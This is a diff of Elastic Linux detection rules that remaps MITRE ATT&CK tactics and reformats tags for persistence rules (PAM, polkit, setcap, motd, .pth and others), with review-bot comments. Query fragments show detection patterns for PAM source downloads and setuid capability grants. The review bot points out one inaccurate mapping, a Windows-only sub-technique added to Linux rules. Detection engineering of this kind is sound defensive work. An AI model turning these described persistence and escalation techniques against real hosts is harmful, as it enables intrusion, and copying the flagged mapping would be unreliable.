@@ -114,18 +114,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -144,16 +133,34 @@ process.executable != null and process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_lkm_configuration_file_creation.toml b/rules/linux/persistence_lkm_configuration_file_creation.toml index 4bf0c7baf4b..f939a674b6d 100644 --- a/rules/linux/persistence_lkm_configuration_file_creation.toml +++ b/rules/linux/persistence_lkm_configuration_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -54,15 +54,7 @@ Loadable Kernel Modules (LKMs) are components that can be dynamically loaded int risk_score = 47 rule_id = "6e2355cc-c60a-4d92-a80c-e54a45ad2400" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,16 +113,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml index 0afee6bda3f..71052803c71 100644 --- a/rules/linux/persistence_manual_dracut_execution.toml +++ b/rules/linux/persistence_manual_dracut_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -82,18 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,21 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1542/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml index 32d08cc31f9..5caeea7b41d 100644 --- a/rules/linux/persistence_message_of_the_day_creation.toml +++ b/rules/linux/persistence_message_of_the_day_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -179,6 +179,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml index 4e5c181f2dd..e685a469553 100644 --- a/rules/linux/persistence_message_of_the_day_execution.toml +++ b/rules/linux/persistence_message_of_the_day_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -205,6 +205,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml index 089f1d5d144..5e52842ddea 100644 --- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml +++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
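Review bot: The sub-technique added to both message-of-the-day rules, `id = "T1037.001"` / `name = "Logon Script (Windows)"`, is a Windows-only sub-technique (its name says so), so it does not belong on rules tagged `OS: Linux`. ATT&CK has no T1037 sub-technique for `/etc/update-motd.d` scripts, so the parent `T1037` mapping the rules already carry is the accurate one; drop the four added lines in both hunks, or, if a sub-technique is wanted, pick one that lists Linux as a platform. Leaving it in also misleads anyone pivoting from these alerts to the ATT&CK matrix.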
@@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -126,42 +115,11 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" 
diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml index dc7660861c7..f8e54f5938d 100644 --- a/rules/linux/persistence_openssl_passwd_hash_generation.toml +++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ not process.args in ("-help", "--help", "-h") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml index a5bebae77f2..231a8a31bd3 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -119,14 +119,19 @@ file where host.os.type == "linux" and event.action == "creation" and process.ex framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -136,7 +141,12 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml index 2505889ddd7..d4ef01be97c 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -101,14 +101,19 @@ file where host.os.type == "linux" and event.type == "creation" and file.name li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -118,7 +123,12 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml index 57331335bcc..03bf5554379 100644 --- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml +++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -65,15 +65,7 @@ references = [ risk_score = 47 rule_id = "96f29282-ffcc-4ce7-834b-b17aee905568" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=3s @@ -105,25 +97,17 @@ sequence by process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml index 458326e408c..974af680518 100644 --- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml +++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml 
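Review bot: The `tags` array is collapsed from one entry per line to a single very long line, so every future tag change rewrites the whole line and per-tag blame is lost; unless this is the output of the repository's rule formatter, keep the one-entry-per-line layout (`tags = [` followed by one indented `"Domain: Endpoint",`-style entry per line and a closing `]`). The tactic content itself is consistent: the remaining `Tactic: Persistence` tag matches the single `[[rule.threat]]` entry left by the second hunk, which is what the new tag/tactic check requires. The same collapse appears in every other tags hunk in this chunk (source_download, polkit_policy_creation, process_capability_set_via_setcap, pth_file_creation, setuid_setgid_capability_set, shared_object_creation, both simple_web_server rules, site_and_user_customize_file_creation and ssh_via_backdoored_system_user).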
@@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,17 +62,7 @@ references = [ risk_score = 47 rule_id = "53ef31ea-1f8a-493b-9614-df23d8277232" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -85,24 +75,11 @@ process.args like~ "https://github.com/linux-pam/linux-pam/releases/download/v*/ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml index 0735fde6ca8..705ed474e08 100644 --- a/rules/linux/persistence_polkit_policy_creation.toml 
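Review bot: After the tactic hunk the rule's only mapping is `T1105` under Command and Control, yet the file sits under the `persistence_` prefix and, judging from the query context `linux-pam/linux-pam/releases/download`, its subject is retrieval of PAM source; nothing in the hunk or the PR description records why the `T1556` Modify Authentication Process mapping was dropped instead of kept in a second `[[rule.threat]]` entry next to the new one. If the single-tactic mapping is deliberate, a one-line rationale in the PR description keeps the rule's intent findable for whoever next touches it. Tags and threat are consistent as written: `Tactic: Command and Control` is the only tactic tag and `TA0011` the only tactic block.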
+++ b/rules/linux/persistence_polkit_policy_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,17 +54,7 @@ Polkit, or PolicyKit, is a system service in Linux environments that manages sys risk_score = 21 rule_id = "0f54e947-9ab3-4dff-9e8d-fb42493eaa2f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,25 +99,12 @@ file.extension in ("rules", "pkla", "policy") and file.path like~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml index ada832ab5a8..fc9be420d9d 100644 
--- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml +++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -145,6 +145,16 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml index 412be59834c..a915555bf2b 100644 --- a/rules/linux/persistence_process_capability_set_via_setcap.toml +++ b/rules/linux/persistence_process_capability_set_via_setcap.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -79,17 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,13 +100,10 @@ process.name == "setcap" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml index 8492cf01914..78290a1d91f 100644 --- a/rules/linux/persistence_pth_file_creation.toml +++ b/rules/linux/persistence_pth_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -85,16 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -139,38 +130,7 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml index 378adc56fd5..6e0ad16550d 100644 --- a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml 
+++ b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -92,11 +92,6 @@ process.args:("-i" or "--install") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -107,35 +102,10 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" - -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable"] diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/persistence_setuid_setgid_capability_set.toml index 7dccbc4c3f0..428eb0ddf21 100644 --- a/rules/linux/persistence_setuid_setgid_capability_set.toml +++ b/rules/linux/persistence_setuid_setgid_capability_set.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/09/05" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -135,17 +135,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -160,14 +150,6 @@ process.name == "setcap" and process.args : "cap_set?id+ep" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" diff --git a/rules/linux/persistence_shared_object_creation.toml b/rules/linux/persistence_shared_object_creation.toml index da1bfc93904..4122d6985d9 100644 --- a/rules/linux/persistence_shared_object_creation.toml +++ b/rules/linux/persistence_shared_object_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -149,15 +149,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Persistence",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
